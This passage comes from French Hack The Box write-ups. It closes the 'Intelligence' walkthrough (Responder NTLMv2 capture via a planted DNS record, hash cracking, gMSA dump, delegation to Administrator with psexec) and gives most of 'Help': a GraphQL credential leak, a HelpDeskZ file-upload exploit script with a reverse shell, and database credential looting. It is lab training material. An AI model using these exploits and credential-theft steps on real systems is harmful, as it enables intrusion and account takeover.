rusthound::json::checker] Checking and replacing some values finished! [2025-09-03T14:50:28Z INFO rusthound::json::maker] 43 users parsed! [2025-09-03T14:50:29Z INFO rusthound::json::maker] 63 groups parsed! [2025-09-03T14:50:29Z INFO rusthound::json::maker] 1 computers parsed! [2025-09-03T14:50:29Z INFO rusthound::json::maker] 1 ous parsed! [2025-09-03T14:50:29Z INFO rusthound::json::maker] 1 domains parsed! [2025-09-03T14:50:29Z INFO rusthound::json::maker] 2 gpos parsed! [2025-09-03T14:50:29Z INFO rusthound::json::maker] 21 containers parsed! [2025-09-03T14:50:29Z INFO rusthound::json::maker] /workspace/Intelligence/bloodhount_data/20250903165028_intelligence-htb_rusthound.zip created! RustHound Enumeration Completed at 16:50:29 on 09/03/25! Happy Graphing! Tiffany.Molina -\u0026gt; Ted.Graves SMB : IT Share En se connectant au share IT on remarque un script powershell. Ce script parcourt tous les domaines DNS enregistrés commencant par \u0026ldquo;web\u0026rdquo; puis effectue une requête HTTP avec Invoke-WebRequest. Si le site n\u0026rsquo;est pas actif, alors la requête echoue et un mail est envoyé à Ted.\nIl est indiqué que le script est executé toutes les 5mn, et vraisembablement est executé par Ted lui même. On remarque l\u0026rsquo;utilisation du paramètre -UseDefaultCredentials ce qui signifie que les creds de celui qui l\u0026rsquo;execute sont transmis lors de la requête.\nSi on arrive à detourner le script pour lui faire faire une requête vers notre ordinateur, on pourrait recupérer le mot de passe de Ted.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 smbclient //10.10.10.248/it -U \u0026#39;Tiffany.Molina%NewIntelligenceCorpUser9876\u0026#39; Try \u0026#34;help\u0026#34; to get a list of possible commands. smb: \\\u0026gt; ls . D 0 Mon Apr 19 02:50:55 2021 .. D 0 Mon Apr 19 02:50:55 2021 downdetector.ps1 A 1046 Mon Apr 19 02:50:55 2021 3770367 blocks of size 4096. 1453177 blocks available smb: \\\u0026gt; get downdetector.ps1 getting file \\downdetector.ps1 of size 1046 as downdetector.ps1 (13.4 KiloBytes/sec) (average 13.4 KiloBytes/sec) smb: \\\u0026gt; [Sep 03, 2025 - 17:13:40 (CEST)] exegol-pentest Intelligence # cat downdetector.ps1 ��# Check web server status. Scheduled to run every 5min Import-Module ActiveDirectory foreach($record in Get-ChildItem \u0026#34;AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb\u0026#34; | Where-Object Name -like \u0026#34;web*\u0026#34;) { try { $request = Invoke-WebRequest -Uri \u0026#34;http://$($record.Name)\u0026#34; -UseDefaultCredentials if(.StatusCode -ne 200) { Send-MailMessage -From \u0026#39;Ted Graves \u0026lt;Ted.Graves@intelligence.htb\u0026gt;\u0026#39; -To \u0026#39;Ted Graves \u0026lt;Ted.Graves@intelligence.htb\u0026gt;\u0026#39; -Subject \u0026#34;Host: $($record.Name) is down\u0026#34; } } catch {} } L\u0026rsquo;idée est donc:\nCréer un record DNS commençant par \u0026ldquo;web\u0026rdquo; avec le compte de Tiffany Mettre en place un responder, qui attend de recevoir une requête et nous donnera un hachage Déchiffrer le hachage. New DNS Record On crée un nouveau DNS record : web666. Il pointe vers notre IP. Pour cela on peut utiliser l\u0026rsquo;outil dnstool.py :\n1 2 3 4 5 6 $ dnstool.py -u \u0026#39;intelligence.htb\\Tiffany.Molina\u0026#39; -p \u0026#39;NewIntelligenceCorpUser9876\u0026#39; -r web666 -a add -d 10.10.16.10 10.10.10.248 [-] Connecting to host... [-] Binding to host [+] Bind OK [-] Adding new record [+] LDAP operation completed successfully Responder On se met en attente d\u0026rsquo;une requête, avec la commande responder :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [Sep 03, 2025 - 22:43:49 (CEST)] exegol-pentest Intelligence # responder -I tun0 -w -F __ .----.-----.-----.-----.-----.-----.--| |.-----.----. | _| -__|__ --| _ | _ | | _ || -__| _| |__| |_____|_____| __|_____|__|__|_____||_____|__| |__| NBT-NS, LLMNR \u0026amp; MDNS Responder 3.1.5.0 [+] Listening for events... [!] Error starting TCP server on port 53, check permissions or other servers running. [HTTP] NTLMv2 Client : 10.10.10.248 [HTTP] NTLMv2 Username : intelligence\\Ted.Graves [HTTP] NTLMv2 Hash : Ted.Graves::intelligence:1122334455667788:BF2803FDDC9EEF7CD931A308E83AAF83:0101000000000000579387554E1DDC014DF34E0577DDBE3A0000000002000800510054003200360001001E00570049004E002D00440046003200570030004700530042004500390050000400140051005400320036002E004C004F00430041004C0003003400570049004E002D00440046003200570030004700530042004500390050002E0051005400320036002E004C004F00430041004C000500140051005400320036002E004C004F00430041004C00080030003000000000000000000000000020000027B3134561E5EAEC1547E28450320466E1AC51EF296269768842659E2D2AD00B0A001000000000000000000000000000000000000900380048005400540050002F007700650062003600360036002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000 Ted NTLMv2 Hash On effectue une attaque par dictionnaire sur le hachage NTLMv2 de Ted.graves et on obtient les credentials suivants : Ted : Mr.Teddy\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 $ hashcat -m 5600 ./hash.txt ~/wordlists/rockyou.txt ... TED.GRAVES::intelligence:112.......000:Mr.Teddy Session..........: hashcat Status...........: Cracked Hash.Mode........: 5600 (NetNTLMv2) Hash.Target......: TED.GRAVES::intelligence:1122334455667788:bf2803fdd...000000 Time.Started.....: Wed Sep 3 22:47:36 2025 (2 secs) Time.Estimated...: Wed Sep 3 22:47:38 2025 (0 secs) ... $ nxc smb 10.10.10.248 -u Ted.graves -p \u0026#39;Mr.Teddy\u0026#39; SMB 10.10.10.248 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False) SMB 10.10.10.248 445 DC [+] intelligence.htb\\Ted.graves:Mr.Teddy Ted.Graves -\u0026gt; svc_int$ ReadGMSAPassword Right on svc_int$ En utilisant bloodhound, on découvre que Ted.Graves fait parti du groupe ITSupport qui a le droit ReadGMSAPassword sur l\u0026rsquo;utilisateur svc_int$.\nEn utilisant la commande gMSADumper.py on peut alors dumper le hachage de svc_int$ :\n1 2 3 4 5 6 7 gMSADumper.py -u \u0026#39;Ted.Graves\u0026#39; -p \u0026#39;Mr.Teddy\u0026#39; -d \u0026#39;intelligence.htb\u0026#39; Users or groups who can read password for svc_int$: \u0026gt; DC$ \u0026gt; itsupport svc_int$:::1dcabcce2cf522bae77d7dc622587879 svc_int$:aes256-cts-hmac-sha1-96:331c8820d64c744ba82a28551b76dc2dc00991df0e253fa613d37c4684e045fd svc_int$:aes128-cts-hmac-sha1-96:40122d8d49ee8c46ea793c19b3a59d08 svc_int$ -\u0026gt; Administrator msDS-AllowedToDelegateTo : WWW/dc.intelligence.htb On remarque que svc_int peut : msDS-AllowedToDelegateTo : WWW/dc.intelligence.htb\nCe qui veut dire que svc_int$ peut se faire passer pour un autre utilisateur uniquement vers le service WWW/dc.intelligence.htb. On peut aussi voir ce resultat directement dans bloodhound.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ldapsearch -x -H ldap://10.10.10.248 -D \u0026#34;intelligence\\Ted.Graves\u0026#34; -w \u0026#34;Mr.Teddy\u0026#34; -b \u0026#34;DC=intelligence,DC=htb\u0026#34; | grep -i msDS-AllowedToDel -A20 -B40 # svc_int, Managed Service Accounts, intelligence.htb dn: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user objectClass: computer objectClass: msDS-GroupManagedServiceAccount cn: svc_int distinguishedName: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=h tb .... msDS-AllowedToDelegateTo: WWW/dc.intelligence.htb Silver Ticket : impersonate Administrator On peut maintenant se faire passer pour l\u0026rsquo;administrateur en générant un silver ticket pour le SPN WWW/dc.intelligence.htb.\nOn utilise ensuite psexec pour obtenir un powershell en tant qu\u0026rsquo;admin avec le ticket généré :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 $ getST.py -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$ -dc-ip 10.10.10.248 -hashes :1dcabcce2cf522bae77d7dc622587879 Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies [*] Getting TGT for user [*] Impersonating Administrator [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in Administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache $ mv Administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache admin.ccache $ export KRB5CCNAME=\u0026#34;admin.ccache\u0026#34; $ psexec.py -k -no-pass intelligence.htb/Administrator@dc.intelligence.htb Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies [*] Requesting shares on dc.intelligence.htb..... [*] Found writable share ADMIN$ [*] Uploading file RKiuvsgB.exe [*] Opening SVCManager on dc.intelligence.htb..... [*] Creating service MGRO on dc.intelligence.htb..... [*] Starting service MGRO..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.1879] (c) 2018 Microsoft Corporation. All rights reserved. C:\\Windows\\system32\u0026gt; type C:\\Users\\Administrator\\Desktop\\root.txt 8fa6.....9f53 Tips Parfois bloodhound n\u0026rsquo;affiche pas toutes les informations. Par exemple, je ne voyais pas la route de Ted vers svc_int.\nEn effet, j\u0026rsquo;ai l\u0026rsquo;habitude de cliquer sur Outbound Object Control-\u0026gt; Transitive Object Control.\nMais il fallait faire :\nOutbound Object Control -\u0026gt; Group Delegated Object Control Attention donc à bien regarder toutes les possibilités de Outbound Object Control sur un utilisateur owned.\nAllowed To Delegate : WWW/dc.intelligence.htb Il faut regarder chaque parametre de l\u0026rsquo;utilisateur sur bloodhound. J\u0026rsquo;aurais dû reperer cela. Tout ne saute pas forcement aux yeux.\npsexec.py -k -no-pass intelligence.htb/Administrator@dc.intelligence.htb Pour psexec, attention ici j\u0026rsquo;ai du préciciser Administrator@dc.intelligence.htb au lieu de l\u0026rsquo;ip que j\u0026rsquo;avais mis initialement : Administrator@10.10.10.248. Il faut bien sûr que **dc.intelligence.htb **soit bien dans le /etc/hosts.\n","date":"2025-09-03T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/intelligence-htb/","title":"HTB | Intelligence"},{"content":" Machine name OS IP Difficulty Editor Linux 10.10.11.80 Easy Soon :)\n","date":"2025-08-28T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/editor-htb/","title":"HTB | Editor"},{"content":" Machine name OS IP Difficulty Help Linux 10.10.10.121 Easy System Info 1 2 3 4 Distributor ID:\tUbuntu Description:\tUbuntu 16.04.5 LTS Release:\t16.04 Codename:\txenial Users 1 2 3 4 ## Graphql helpme@helpme.com : godhelpmeplz ## PAM / SSH help : Welcome1 Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 $ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.121 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e5bb4d9cdeaf6bbfba8c227ad8d74328 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZY4jlvWqpdi8bJPUnSkjWmz92KRwr2G6xCttorHM8Rq2eCEAe1ALqpgU44L3potYUZvaJuEIsBVUSPlsKv+ds8nS7Mva9e9ztlad/fzBlyBpkiYxty+peoIzn4lUNSadPLtYH6khzN2PwEJYtM/b6BLlAAY5mDsSF0Cz3wsPbnu87fNdd7WO0PKsqRtHpokjkJ22uYJoDSAM06D7uBuegMK/sWTVtrsDakb1Tb6H8+D0y6ZQoE7XyHSqD0OABV3ON39GzLBOnob4Gq8aegKBMa3hT/Xx9Iac6t5neiIABnG4UP03gm207oGIFHvlElGUR809Q9qCJ0nZsup4bNqa/ | 256 d5b010507486a39fc5536f3b4a246119 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHINVMyTivG0LmhaVZxiIESQuWxvN2jt87kYiuPY2jyaPBD4DEt8e/1kN/4GMWj1b3FE7e8nxCL4PF/lR9XjEis= | 256 e21b88d37621d41e38154a8111b79907 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHxDPln3rCQj04xFAKyecXJaANrW3MBZJmbhtL4SuDYX 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 |_http-title: Did not follow redirect to http://help.htb/ | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) 3000/tcp open http syn-ack ttl 63 Node.js Express framework |_http-title: Site doesn\u0026#39;t have a title (application/json; charset=utf-8). | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS Foothold Graphql : Getting creds using the API On découvre une API graphql sur le port 3000 à l\u0026rsquo;aide dirsearch. A l\u0026rsquo;aide de ChatGPT, on comprend comment effectuer des requêtes afin de comprendre la structure des données disponibles et de récupérer des informations.\nOn trouve finalement un user/password après quelques requetes :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 $ dirsearch -u http://10.10.10.121:3000/ _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289 Target: http://10.10.10.121:3000/ [00:50:04] Scanning: [00:50:13] 400 - 18B - /graphql [00:50:13] 400 - 18B - /graphql/ [00:50:13] 400 - 18B - /graphql/console [00:50:13] 400 - 18B - /graphql/schema.yaml [00:50:13] 400 - 18B - /graphql/graphql [00:50:13] 400 - 18B - /graphql/schema.json [00:50:13] 400 - 18B - /graphql/schema.xml Task Completed $ curl -X POST http://10.10.10.121:3000/graphql \\ -H \u0026#34;Content-Type: application/json\u0026#34; \\ -d \u0026#39;{\u0026#34;query\u0026#34;:\u0026#34;{ __typename }\u0026#34;}\u0026#39; {\u0026#34;data\u0026#34;:{\u0026#34;__typename\u0026#34;:\u0026#34;Query\u0026#34;}} $ curl -X POST http://10.10.10.121:3000/graphql \\ -H \u0026#34;Content-Type: application/json\u0026#34; \\ -d \u0026#39;{\u0026#34;query\u0026#34;:\u0026#34;{ __schema { types { name fields { name } } } }\u0026#34;}\u0026#39; {\u0026#34;data\u0026#34;:{\u0026#34;__schema\u0026#34;:{\u0026#34;types\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;Query\u0026#34;,\u0026#34;fields\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;user\u0026#34;}]},{\u0026#34;name\u0026#34;:\u0026#34;User\u0026#34;,\u0026#34;fields\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;username\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;password\u0026#34;}]},{\u0026#34;name\u0026#34;:\u0026#34;String\u0026#34;,\u0026#34;fields\u0026#34;:null},{\u0026#34;name\u0026#34;:\u0026#34;__Schema\u0026#34;,\u0026#34;fields\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;types\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;queryType\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;mutationType\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;subscriptionType\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;directives\u0026#34;}]},{\u0026#34;name\u0026#34;:\u0026#34;__Type\u0026#34;,\u0026#34;fields\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;kind\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;name\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;description\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;fields\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;interfaces\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;possibleTypes\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;enumValues\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;inputFields\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;ofType\u0026#34;}]},{\u0026#34;name\u0026#34;:\u0026#34;__TypeKind\u0026#34;,\u0026#34;fields\u0026#34;:null},{\u0026#34;name\u0026#34;:\u0026#34;Boolean\u0026#34;,\u0026#34;fields\u0026#34;:null},{\u0026#34;name\u0026#34;:\u0026#34;__Field\u0026#34;,\u0026#34;fields\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;name\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;description\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;args\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;type\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;isDeprecated\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;deprecationReason\u0026#34;}]},{\u0026#34;name\u0026#34;:\u0026#34;__InputValue\u0026#34;,\u0026#34;fields\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;name\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;description\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;type\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;defaultValue\u0026#34;}]},{\u0026#34;name\u0026#34;:\u0026#34;__EnumValue\u0026#34;,\u0026#34;fields\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;name\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;description\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;isDeprecated\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;deprecationReason\u0026#34;}]},{\u0026#34;name\u0026#34;:\u0026#34;__Directive\u0026#34;,\u0026#34;fields\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;name\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;description\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;locations\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;args\u0026#34;}]},{\u0026#34;name\u0026#34;:\u0026#34;__DirectiveLocation\u0026#34;,\u0026#34;fields\u0026#34;:null}]}}} $ curl -X POST http://10.10.10.121:3000/graphql \\ -H \u0026#34;Content-Type: application/json\u0026#34; \\ -d \u0026#39;{\u0026#34;query\u0026#34;:\u0026#34;{ user { username password } }\u0026#34;}\u0026#39; {\u0026#34;data\u0026#34;:{\u0026#34;user\u0026#34;:{\u0026#34;username\u0026#34;:\u0026#34;helpme@helpme.com\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;5d3c93182bb20f07b994a7f617e99cff\u0026#34;}}} Avec hashcat, on reussi à récupérer le mot de passe suivant : godhelpmeplz\n1 2 hashcat -m 0 ./hash.txt ~/wordlists/rockyou.txt --show 5d3c93182bb20f07b994a7f617e99cff:godhelpmeplz Helpdeskz - version 1.0.2 On remarque Helpdeskz est installé avec une version vulnérable (potentiellment 2 CVE).\n1 2 3 4 5 6 7 8 9 10 11 12 http://help.htb/support/UPGRADING.txt -------------- Welcome to HelpDeskZ 1.0.2 ========================== We have made some changes in this new version like: - SEO-friendly URLs compatibility fixed - Login with Facebook account (Facebook connect) - Login with Google account (Google OAuth) File Upload : PHP reverse shell On trouve un premier exploit qui ne fonctionne pas, il s\u0026rsquo;agit d\u0026rsquo;un file upload permettant d\u0026rsquo;executer du code php. En realité la machine est bien exploitable, mais l\u0026rsquo;exploit ne fonctionne pas à cause d\u0026rsquo;un problème d\u0026rsquo;horaire. La machine n\u0026rsquo;est pas à la meme heure que la notre, et l\u0026rsquo;exploit est basé, en autre, sur l\u0026rsquo;heure. Il a donc fallu rajotuer dans l\u0026rsquo;exploit ceci:\n1 2 3 4 5 6 ##Getting the Time from the server response = requests.head(\u0026#39;http://10.10.10.121/support/\u0026#39;) serverTime = response.headers[\u0026#39;Date\u0026#39;] ##setting the time in Epoch FormatTime = \u0026#39;%a, %d %b %Y %H:%M:%S %Z\u0026#39; currentTime = int(calendar.timegm(time.strptime(serverTime, FormatTime))) Cela permet de recuperer l\u0026rsquo;heure exacte défini sur Helpdeskz, c\u0026rsquo;est important pour la suite de l\u0026rsquo;exploitation. En cherchant un peu sur github, on trouve justement l\u0026rsquo;exploit original avec ces quelques lignes de code supplémentaire (je n\u0026rsquo;ai pas eu besoin de rajouter ce code moi même mais c\u0026rsquo;était faisable.).\nVoici le fichier d\u0026rsquo;exploitation en Python permettant d\u0026rsquo;executer le fichier téléchargé sur la machine. Dans un premier temps il a fallu creer un ticket et ajouter une piece jointe avec un fichier php (reverse shell). Il faut, seulement ensuite, executer le code python qui doit retrouver le fichier php et l\u0026rsquo;executer.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 ##!/bin/python ##This is a modified version of https://www.exploit-db.com/raw/40300 ##Since the sysntax on time calculation is incorect \u0026#39;\u0026#39;\u0026#39; The default configuration of this software allows for php files to be uploaded Steps to reproduce Fill out a ticket form and attach a php file, solve the captcha and upload, (the application will display \u0026#39;File is not allowed\u0026#39; but the file is still uploaded!! Set up a netcat session to catch the reverse shell Run this script and receive a reverse shell back!!! \u0026#39;\u0026#39;\u0026#39; import hashlib import time, calendar import sys import requests print \u0026#39;HelpDesk v1.0.2 - Unauthenticated shell upload\u0026#39; if len(sys.argv) \u0026lt; 3: print \u0026#34;Usage: {} http://helpdeskz.com/support/uploads/tickets/ Reverse-shell.php\u0026#34;.format(sys.argv[0]) sys.exit(1) helpdeskzBaseUrl = sys.argv[1] fileName = sys.argv[2] ##Getting the Time from the server response = requests.head(\u0026#39;http://10.10.10.121/support/\u0026#39;) serverTime = response.headers[\u0026#39;Date\u0026#39;] ##setting the time in Epoch FormatTime = \u0026#39;%a, %d %b %Y %H:%M:%S %Z\u0026#39; currentTime = int(calendar.timegm(time.strptime(serverTime, FormatTime))) for x in range(0,300): plaintext = fileName + str(currentTime -x) md5hash = hashlib.md5(plaintext).hexdigest() url = helpdeskzBaseUrl + md5hash + \u0026#39;.php\u0026#39; response = requests.head(url) if response.status_code == 200: print(\u0026#34;found!\u0026#34;) print(url) sys.exit(0) print(\u0026#34;Sorry, I did not find anything\u0026#34;) On voit ici l\u0026rsquo;obtention d\u0026rsquo;un reverse shell :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 $ nc -lnvp 9001 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::9001 Ncat: Listening on 0.0.0.0:9001 Ncat: Connection from 10.10.10.121. Ncat: Connection from 10.10.10.121:34876. SOCKET: Shell has connected! PID: 1312 whoami help python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; help@help:/var/www/html/support/uploads/tickets$ export TERM=xterm export TERM=xterm help@help:/var/www/html/support/uploads/tickets$ ^Z [1] + 3405 suspended nc -lnvp 9001 [Aug 26, 2025 - 00:39:46 (CEST)] exegol-pentest /workspace # stty raw -echo;fg [1] + 3405 continued nc -lnvp 9001 help@help:/var/www/html/support/uploads/tickets$ help@help:/var/www/html/support/uploads/tickets$ ls 072358eef300beb18834f16ffb121aee.php 5d13aeec839047b1647d58538fd788b8.png 1041ae9bd805fcd792d6a1e775ca8fab.txt c89564cd603a96bafcd9e53210d6042b.txt 11768880feca2125903635561dd4d047.php fd517142e88d1dfb1c8616b7f8824891.txt 1c9c8783677b6498d5e2453241c6c3b9.php index.php 316c27c726d57e961f236992c9788715.php help@help:/var/www/html/support/uploads/tickets$ cd /home/ help@help:/home$ ls help help@help:/home$ cd help/ help@help:/home/help$ ls help npm-debug.log user.txt -------------\u0026gt; help@help:/home/help$ cat user.txt b800.....6650 ---------------------------------------------------------------- python2 final2.py http://help.htb/support/uploads/tickets/ s2.php HelpDesk v1.0.2 - Unauthenticated shell upload 1756161392 On obtient finalement un shell en tant que l\u0026rsquo;utilisateur help.\nSecond File Upload / SQL Injection CVE Une deuxième exploitation était possible. Il fallait se connecter avec les credentials trouvés dans graphql sur la plateforme Helpdeskz et poster un ticket avec une pièce-jointe. Il était alors possible ensuite de faire des requêtes vers cette pièce jointe en faisant une injection SQL dans l\u0026rsquo;url.\nEn sauvegardant la requête à l\u0026rsquo;aide Burp, puis en utilisant sqlmap, il n\u0026rsquo;est pas trop dur de l\u0026rsquo;exploiter. J\u0026rsquo;ai tenté d\u0026rsquo;utiliser une exploit déjà écrite, mais ça n\u0026rsquo;a pas fonctionné. A la fin, vous pouvez voir comment l\u0026rsquo;exploiter dans la section Bonus.\nmysql : staff table En cherchant dans les fichiers de site web, on trouve un dossier includes avec un fichier config.php contenant les credentials pour se connecter à une base de donnée SQL. En cherchant dans la base de données on découvre une base de donnée support avec une table staff contenant un user \u0026ldquo;admin\u0026rdquo; et un hachage :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 help@help:/var/www$ cd html help@help:/var/www/html$ ls index.html support help@help:/var/www/html$ cd support help@help:/var/www/html/support$ ls LICENSE.txt captcha.php facebookOAuth images js views README.md controllers favicon.ico includes readme.html UPGRADING.txt css googleOAuth index.php uploads help@help:/var/www/html/support$ cd includes/ help@help:/var/www/html/support/includes$ ls PHPMailer classes helpdesk.inc.php pipe.php Twig config.php index.php staff.inc.php bootstrap.php functions.php language support.sql captcha.ttf global.php parser timezone.inc.php help@help:/var/www/html/support/includes$ cat config.php \u0026lt;?php $config[\u0026#39;Database\u0026#39;][\u0026#39;dbname\u0026#39;] = \u0026#39;support\u0026#39;; $config[\u0026#39;Database\u0026#39;][\u0026#39;tableprefix\u0026#39;] = \u0026#39;\u0026#39;; $config[\u0026#39;Database\u0026#39;][\u0026#39;servername\u0026#39;] = \u0026#39;localhost\u0026#39;; $config[\u0026#39;Database\u0026#39;][\u0026#39;username\u0026#39;] = \u0026#39;root\u0026#39;; $config[\u0026#39;Database\u0026#39;][\u0026#39;password\u0026#39;] = \u0026#39;helpme\u0026#39;; $config[\u0026#39;Database\u0026#39;][\u0026#39;type\u0026#39;] = \u0026#39;mysqli\u0026#39;; ?\u0026gt; Connexion à la base de donnée mysql en utilisant les credentials trouvés précédemment :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 help@help:/var/www/html/support/includes$ mysql -u root -p Enter password: Welcome to the MySQL monitor. Commands end with ; or \\g. Your MySQL connection id is 785 Server version: 5.7.24-0ubuntu0.16.04.1 (Ubuntu) Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type \u0026#39;help;\u0026#39; or \u0026#39;\\h\u0026#39; for help. Type \u0026#39;\\c\u0026#39; to clear the current input statement. mysql\u0026gt; .tables -\u0026gt; ; ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0026#39;.tables\u0026#39; at line 1 mysql\u0026gt; show tables; ERROR 1046 (3D000): No database selected mysql\u0026gt; show db; ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0026#39;db\u0026#39; at line 1 mysql\u0026gt; show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | support | | sys | +--------------------+ 5 rows in set (0.02 sec) mysql\u0026gt; use support Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql\u0026gt; show tables -\u0026gt; ; +--+ | Tables_in_support | +--+ | articles | | attachments | | canned_response | | custom_fields | | departments | | emails | | error_log | | file_types | | knowledgebase_category | | login_attempt | | login_log | | news | | pages | | priority | | settings | | staff | | tickets | | tickets_messages | | users | +--+ 19 rows in set (0.00 sec) mysql\u0026gt; select * from staff; +----+----------+--------------------+---------------+--------------------+------------+------------+--------------------+----------+--------+--+--------+-------+--------+ | id | username | password | fullname | email | login | last_login | department | timezone | signature | newticket_notification | avatar | admin | status | +----+----------+--------------------+---------------+--------------------+------------+------------+--------------------+----------+--------+--+--------+-------+--------+ | 1 | admin | d318f44739dced66793b1a603028133a76ae680e | Administrator | support@mysite.com | 1547216217 | 1543429746 | a:1:{i:0;s:1:\u0026#34;1\u0026#34;;} | | Best regards, Administrator | 0 | NULL | 1 | Enable | +----+----------+--------------------+---------------+--------------------+------------+------------+--------------------+----------+--------+--+--------+-------+--------+ 1 row in set (0.00 sec) mysql\u0026gt; exit; En utilisant crackstation.net, on tente de retrouver le mot de passe relié au hachage et on obtient: d318f44739dced66793b1a603028133a76ae680e -\u0026gt; Welcome1\nOn peut maintenant se connecter en SSH avec le compte help et ce mot de passe (PASSWORD REUSE\u0026hellip;) :\n1 2 3 4 5 6 7 8 9 10 ssh help@help.htb help@help.htb\u0026#39;s password: Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.4.0-116-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage You have new mail. Last login: Fri Jan 11 06:18:50 2019 help@help:~$ Privilege Escalation Vulnerable Kernel : Linux version 4.4.0-116-generic En utilisant linpeas, on 